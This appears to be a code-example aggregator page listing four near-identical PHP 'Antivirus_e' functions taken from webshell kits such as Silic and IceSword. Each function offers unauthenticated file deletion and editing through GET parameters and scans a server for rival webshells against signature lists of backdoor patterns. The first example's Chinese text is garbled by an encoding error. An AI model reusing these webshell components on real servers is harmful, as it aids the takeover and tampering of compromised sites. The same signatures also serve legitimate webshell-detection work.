PHP Antivirus_Auto示例

示例#1

文件： silic.php 项目： evil7/webshell

function Antivirus_e()
{
    if (!empty($_GET['df'])) {
        echo $_GET['df'];
        if (@unlink($_GET['df'])) {
            echo 'ɾ���ɹ�';
        } else {
            @chmod($_GET['df'], 0666);
            echo @unlink($_GET['df']) ? 'ɾ���ɹ�' : 'ɾ��ʧ��';
        }
        return false;
    }
    if (!empty($_GET['fp']) && !empty($_GET['fn']) && !empty($_GET['dim'])) {
        File_Edit($_GET['fp'], $_GET['fn'], $_GET['dim']);
        return false;
    }
    $SCAN_DIR = isset($_POST['sp']) ? $_POST['sp'] : File_Mode();
    $features_php = array('evalһ�仰����' => 'eval(', '����read����' => '->read()', '����readdir����3' => 'readdir(', 'MYSQL�Զ��庯������' => 'returns string soname', '��������1' => 'eval(gzinflate(', '��������2' => 'eval(base64_decode(', '��������3' => 'base64_decode(', 'evalһ�仰2' => 'eval (', 'php��������' => 'copy($_FILES', '��������2' => 'copy ($_FILES', '�ϴ�����' => 'move_uploaded_file($_FILES', '�ϴ�����2' => 'move_uploaded_file ($_FILES', 'С������' => 'str_replace(\'\\\\\',\'/\',');
    $features_asx = array('�ű�����' => 'VBScript.Encode', '��������' => '#@~^', 'fso����' => 'fso.createtextfile(path,true)', 'excuteһ�仰' => 'execute', 'evalһ�仰' => 'eval', 'wscript����' => 'F935DC22-1CF0-11D0-ADB9-00C04FD58A0B', '���ݿ���������' => '13709620-C279-11CE-A49E-444553540000', 'wscript����' => 'WScript.Shell', 'fso����' => '0D43FE01-F093-11CF-8940-00A0C9054228', 'ʮ������' => '����', 'aspx��������' => 'Process.GetProcesses', 'aspxһ�仰' => 'Request.BinaryRead');
    print <<<END
<form method="POST" name="tform" id="tform" action="?s=e">
<div class="actall">ɨ��·�� <input type="text" name="sp" id="sp" value="{$SCAN_DIR}" style="width:600px;"></div>
<div class="actall">ľ������ <input type="checkbox" name="stphp" value="php" checked>phpľ��
<input type="checkbox" name="stasx" value="asx">asp+aspxľ��</div>
<div class="actall" style="height:50px;"><input type="radio" name="sb" value="a" checked>��ɨ��Ӧ���ڸ��ļ���,���ļ��к��ļ�
<br><input type="radio" name="sb" value="b">����ɨ��Ӧ���ڸ��ļ���</div>
<div class="actall"><input type="submit" value="��ʼɨ��" style="width:80px;"></div>
</form>
END;
    if (!empty($_POST['sp'])) {
        echo '<div class="actall">';
        if (isset($_POST['stphp'])) {
            $features_all = $features_php;
            $st = '\\.php|\\.inc|\\;';
        }
        if (isset($_POST['stasx'])) {
            $features_all = $features_asx;
            $st = '\\.asp|\\.asa|\\.cer|\\.aspx|\\.ascx|\\;';
        }
        if (isset($_POST['stphp']) && isset($_POST['stasx'])) {
            $features_all = array_merge($features_php, $features_asx);
            $st = '\\.php|\\.inc|\\.asp|\\.asa|\\.cer|\\.aspx|\\.ascx|\\;';
        }
        $sb = $_POST['sb'] == 'a' ? true : false;
        echo Antivirus_Auto($_POST['sp'], $features_all, $st, $sb) ? 'ɨ������' : '�쳣��ֹ';
        echo '</div>';
    }
    return true;
}

示例#2

文件： icesword.php 项目： mcanv/webshell

function Antivirus_e()
{
    if (!empty($_GET['df'])) {
        echo $_GET['df'];
        if (@unlink($_GET['df'])) {
            echo '删除成功';
        } else {
            @chmod($_GET['df'], 0666);
            echo @unlink($_GET['df']) ? '删除成功' : '删除失败';
        }
        return false;
    }
    if (!empty($_GET['fp']) && !empty($_GET['fn']) && !empty($_GET['dim'])) {
        File_Edit($_GET['fp'], $_GET['fn'], $_GET['dim']);
        return false;
    }
    $SCAN_DIR = isset($_POST['sp']) ? $_POST['sp'] : File_Mode();
    $features_php = array('eval一句话特征' => 'eval(', '大马read特征' => '->read()', '大马readdir特征3' => 'readdir(', 'MYSQL自定义函数语句' => 'returns string soname', '加密特征1' => 'eval(gzinflate(', '加密特征2' => 'eval(base64_decode(', '加密特征3' => 'base64_decode(', 'eval一句话2' => 'eval (', 'php复制特征' => 'copy($_FILES', '复制特征2' => 'copy ($_FILES', '上传特征' => 'move_uploaded_file($_FILES', '上传特征2' => 'move_uploaded_file ($_FILES', '小马特征' => 'str_replace(\'\\\\\',\'/\',');
    $features_asx = array('脚本加密' => 'VBScript.Encode', '加密特征' => '#@~^', 'fso组件' => 'fso.createtextfile(path,true)', 'excute一句话' => 'execute', 'eval一句话' => 'eval', 'wscript特征' => 'F935DC22-1CF0-11D0-ADB9-00C04FD58A0B', '数据库操作特征' => '13709620-C279-11CE-A49E-444553540000', 'wscript特征' => 'WScript.Shell', 'fso特征' => '0D43FE01-F093-11CF-8940-00A0C9054228', '十三函数' => '╋╁', 'aspx大马特征' => 'Process.GetProcesses', 'aspx一句话' => 'Request.BinaryRead');
    print <<<END
<form method="POST" name="tform" id="tform" action="?s=e">
<div class="actall">扫描路径 <input type="text" name="sp" id="sp" value="{$SCAN_DIR}" style="width:600px;"></div>
<div class="actall">木马类型 <input type="checkbox" name="stphp" value="php" checked>php木马 
<input type="checkbox" name="stasx" value="asx">asp+aspx木马</div>
<div class="actall" style="height:50px;"><input type="radio" name="sb" value="a" checked>将扫马应用于该文件夹,子文件夹和文件
<br><input type="radio" name="sb" value="b">仅将扫马应用于该文件夹</div>
<div class="actall"><input type="submit" value="开始扫描" style="width:80px;"></div>
</form>
END;
    if (!empty($_POST['sp'])) {
        echo '<div class="actall">';
        if (isset($_POST['stphp'])) {
            $features_all = $features_php;
            $st = '\\.php|\\.inc|\\;';
        }
        if (isset($_POST['stasx'])) {
            $features_all = $features_asx;
            $st = '\\.asp|\\.asa|\\.cer|\\.aspx|\\.ascx|\\;';
        }
        if (isset($_POST['stphp']) && isset($_POST['stasx'])) {
            $features_all = array_merge($features_php, $features_asx);
            $st = '\\.php|\\.inc|\\.asp|\\.asa|\\.cer|\\.aspx|\\.ascx|\\;';
        }
        $sb = $_POST['sb'] == 'a' ? true : false;
        echo Antivirus_Auto($_POST['sp'], $features_all, $st, $sb) ? '扫描完毕' : '异常终止';
        echo '</div>';
    }
    return true;
}

示例#3

文件： Silic Group php Webshell v3.php 项目： wucaishi/WebShell-1

function Antivirus_e()
{
    if (!empty($_GET['df'])) {
        echo $_GET['df'];
        if (@unlink($_GET['df'])) {
            echo '删除成功';
        } else {
            @chmod($_GET['df'], 0666);
            echo @unlink($_GET['df']) ? '删除成功' : '删除失败';
        }
        return false;
    }
    if (!empty($_GET['fp']) && !empty($_GET['fn']) && !empty($_GET['dim'])) {
        File_Edit($_GET['fp'], $_GET['fn'], $_GET['dim']);
        return false;
    }
    $SCAN_DIR = isset($_POST['sp']) ? $_POST['sp'] : File_Mode();
    $features_php = array('php一句话特征' => 'eval(', 'php大马特征2' => '->read()', 'php大马特征3' => 'readdir(', '危险MYSQL语句4' => 'returns string soname', 'php加密大马特征5' => 'eval(gzinflate(', 'php加密大马特征6' => 'eval(base64_decode(', 'php加密大马特征7' => 'base64_decode(', 'php一句话特征8' => 'eval (', 'php上传后门特征9' => 'copy($_FILES', 'php上传后门特征10' => 'copy ($_FILES', 'php上传后门特征11' => 'move_uploaded_file($_FILES', 'php上传后门特征12' => 'move_uploaded_file ($_FILES', 'php小马特征13' => 'str_replace(\'\\\\\',\'/\',');
    $features_asx = array('asp小马特征1' => '绝对路径', 'asp小马特征2' => '挂马', 'asp小马特征3' => 'fso.createtextfile(path,true)', 'asp一句话特征4' => '<%execute(request', 'asp一句话特征5' => '<%eval request', 'asp一句话特征6' => 'execute session(', 'asp数据库后门特征7' => '--Created!', 'asp大马特征8' => 'WScript.Shell', 'asp加密特征' => '<%@ LANGUAGE = VBScript.Encode %>', 'aspx大马特征10' => 'www.rootkit.net.cn', 'aspx大马特征11' => 'Process.GetProcesses', 'aspx大马特征12' => 'lake2');
    print <<<END
<form method="POST" name="tform" id="tform" action="?s=e">
<div class="actall">扫描路径 <input type="text" name="sp" id="sp" value="{$SCAN_DIR}" style="width:600px;"></div>
<div class="actall">木马类型 <input type="checkbox" name="stphp" value="php" checked>php木马 
<input type="checkbox" name="stasx" value="asx">asp+aspx木马</div>
<div class="actall" style="height:50px;"><input type="radio" name="sb" value="a" checked>将扫马应用于该文件夹,子文件夹和文件
<br><input type="radio" name="sb" value="b">仅将扫马应用于该文件夹</div>
<div class="actall"><input type="submit" value="开始扫描" style="width:80px;"></div>
</form>
END;
    if (!empty($_POST['sp'])) {
        echo '<div class="actall">';
        if (isset($_POST['stphp'])) {
            $features_all = $features_php;
            $st = '\\.php|\\.inc|\\;';
        }
        if (isset($_POST['stasx'])) {
            $features_all = $features_asx;
            $st = '\\.asp|\\.asa|\\.cer|\\.aspx|\\.ascx|\\;';
        }
        if (isset($_POST['stphp']) && isset($_POST['stasx'])) {
            $features_all = array_merge($features_php, $features_asx);
            $st = '\\.php|\\.inc|\\.asp|\\.asa|\\.cer|\\.aspx|\\.ascx|\\;';
        }
        $sb = $_POST['sb'] == 'a' ? true : false;
        echo Antivirus_Auto($_POST['sp'], $features_all, $st, $sb) ? '扫描完毕' : '异常终止';
        echo '</div>';
    }
    return true;
}

示例#4

文件： r00ts php大马.php 项目： mcanv/webshell

function Antivirus_e()
{
    if (!empty($_GET['df'])) {
        echo $_GET['df'];
        if (@unlink($_GET['df'])) {
            echo ' <font style=font:11pt color=ff0000>del successfully</font>';
        } else {
            @chmod($_GET['df'], 0666);
            echo @unlink($_GET['df']) ? ' <font style=font:11pt color=ff0000>del successfully</font>' : ' <font style=font:11pt color=ff0000>del faild</font>';
        }
        return false;
    }
    if (!empty($_GET['fp']) && !empty($_GET['fn']) && !empty($_GET['dim'])) {
        File_Edit($_GET['fp'], $_GET['fn'], $_GET['dim']);
        return false;
    }
    $SCAN_DIR = File_Mode() == '' ? File_Str(dirname(__FILE__)) : File_Mode();
    $features_php = array('ftp.class.php' => 'ftp.class.php', 'cha88.cn' => 'cha88.cn', 'Security Angel Team' => 'Security Angel Team', 'read()' => '->read()', 'readdir' => 'readdir(', 'return string soname' => 'returns string soname', 'eval()' => 'eval(gzinflate(', 'eval(base64_decode())' => 'eval(base64_decode(', 'eval($_POST)' => 'eval($_POST', 'eval($_REQUEST)' => 'eval($_REQUEST', 'eval ($_)' => 'eval ($_', 'copy()' => 'copy($_FILES', 'copy ()' => 'copy ($_FILES', 'move_uploaded_file()' => 'move_uploaded_file($_FILES', 'move_uploaded_file ()' => 'move_uploaded_file ($_FILES', 'str_replace()' => 'str_replace(\'\\\\\',\'/\',');
    $features_asx = array('绝对路径' => '绝对路径', '输入马的内容' => '输入马的内容', 'fso.createtextfile()' => 'fso.createtextfile(path,true)', '<%execute(request())%>' => '<%execute(request', '<%eval request()%>' => '<%eval request', 'execute session()' => 'execute session(', '--Created!' => '--Created!', 'WScript.Shell' => 'WScript.Shell', '<%s LANGUAGE = VBScript.Encode %>' => '<%@ LANGUAGE = VBScript.Encode %>', 'www.rootkit.net.cn' => 'www.rootkit.net.cn', 'Process.GetProcesses' => 'Process.GetProcesses', 'lake2' => 'lake2');
    print <<<END
<div class="actall" style="height:100px;"><form method="POST" name="tform" id="tform" action="?s=e">
Path: <input type="text" name="sp" id="sp" value="{$SCAN_DIR}" style="width:400px;">
<select name="st">
<option value="php">phpshell</option>
<option value="asx">aspshell+aspxshell</option>
<option value="ppp">phpshell+aspshell+aspxshell</option>
</select>
<input class="bt" type="submit" value="Scan">
</form><br>
END;
    if (!empty($_POST['sp'])) {
        if ($_POST['st'] == 'php') {
            $features_all = $features_php;
            $st = '\\.php|\\.inc|\\.php4|\\.php3|\\._hp|\\;';
        }
        if ($_POST['st'] == 'asx') {
            $features_all = $features_asx;
            $st = '\\.asp|\\.asa|\\.cer|\\.aspx|\\.ascx|\\.cdx|\\;';
        }
        if ($_POST['st'] == 'ppp') {
            $features_all = array_merge($features_php, $features_asx);
            $st = '\\.php|\\.inc|\\.php4|\\.php3|\\._hp|\\.asp|\\.asa|\\.cer|\\.cdx|\\.aspx|\\.ascx|\\;';
        }
        echo Antivirus_Auto($_POST['sp'], $features_all, $st) ? 'Done' : 'Abort';
    }
    echo '</div>';
    return true;
}